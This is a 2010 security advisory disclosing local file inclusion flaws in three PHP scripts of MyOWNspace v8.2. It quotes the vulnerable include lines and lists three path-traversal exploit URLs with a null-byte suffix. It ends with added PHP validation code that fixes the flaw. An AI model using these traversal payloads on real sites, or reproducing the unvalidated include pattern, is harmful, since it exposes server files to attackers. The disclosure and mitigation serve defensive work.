MyOWNspace_v8.2 multi local file include

2010.03.28
Credit: ItSecTeam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===========================================================================
( #Topic         : MyOWNspace_v8.2
( #Bug type      : multi local file include
( #Download      : http://sourceforge.net/project/platformdownload.php?group_id=174729
( #Advisory      :
===========================================================================
( #Author        : ItSecTeam
( #Email         : Bug@ITSecTeam.com
( #Website       : http://www.itsecteam.com
( #Forum         : http://forum.ITSecTeam.com
( #discovered by : ahmadbady

vuls:===================================================================
path/graph.php

if (isset($_GET['go'])) {$go=$_GET['go'];        line 28
$i=$go;                                          line 30
.
.
.
$friends="myownfriends/friends.".$i.".php";      line 38
include $friends;                                line 39
.
.
.
.
.
$friends="myownfriends/friends.".$i.".php";      line 74
include $friends;                                line 75
---------------------------------------------------------------------------
path/myowngraph.php

error graph.php line 39;

if (isset($_GET['go'])) {$go=$_GET['go'];        line 28
$i=$go;                                          line 29
include $friends;                                line 39
---------------------------------------------------------------------------
path/showmyownfriends.php

$conf_file="myownfriends/friends.".$_GET['go'].".php";   line 3
include $conf_file;                                      line 17
---------------------------------------------------------------------------

exploit:===================================================================
path/graph.php?go=../../../../../../../boot.ini%00
path/myowngraph.php?go=../../../../../../../boot.ini%00
path/showmyownfriends.php?go=../../../../../../../boot.ini%00
---------------------------------------------------------------------------
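
mitigation (added example, not MyOWNspace or ItSecTeam code):==============
All three scripts build the include path directly from $_GET['go']. The sketch below validates the value before it reaches include; the function name resolve_friends_file() and the assumption that a valid "go" is a short decimal id are hypothetical, and the demo directory and inputs are constructed.

```php
<?php
// Added example, not MyOWNspace code. Assumption: a valid "go" value is a
// short decimal id that selects myownfriends/friends.<id>.php.

function resolve_friends_file(string $go, string $baseDir): ?string
{
    // Allow-list: 1-10 ASCII digits only. Rejects "../", slashes and NUL bytes,
    // so the "%00" suffix truncation never reaches the filesystem layer.
    if (preg_match('/\A[0-9]{1,10}\z/', $go) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Defence in depth: canonicalise, then confirm the result is inside $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . "friends." . $go . ".php");
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temp directory holding one legitimate friends file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "myownfriends_demo_" . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . "friends.7.php", "<?php // constructed sample\n");

// Constructed inputs: a valid id, a missing id, the advisory's traversal
// value (already URL-decoded), a mixed value, and an empty string.
$samples = ["7", "8", "../../../../../../../boot.ini\0", "7/../friends.7", ""];
foreach ($samples as $go) {
    $file = resolve_friends_file($go, $dir);
    printf("%-45s => %s\n", json_encode($go),
        $file === null ? "rejected" : "include " . basename($file));
}

// Clean up the constructed demo files.
unlink($dir . DIRECTORY_SEPARATOR . "friends.7.php");
rmdir($dir);
```

Only the first sample resolves to a file; the others are rejected. In graph.php, myowngraph.php and showmyownfriends.php the same check would sit in front of each include, with a null result answered by an error response instead of an include.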

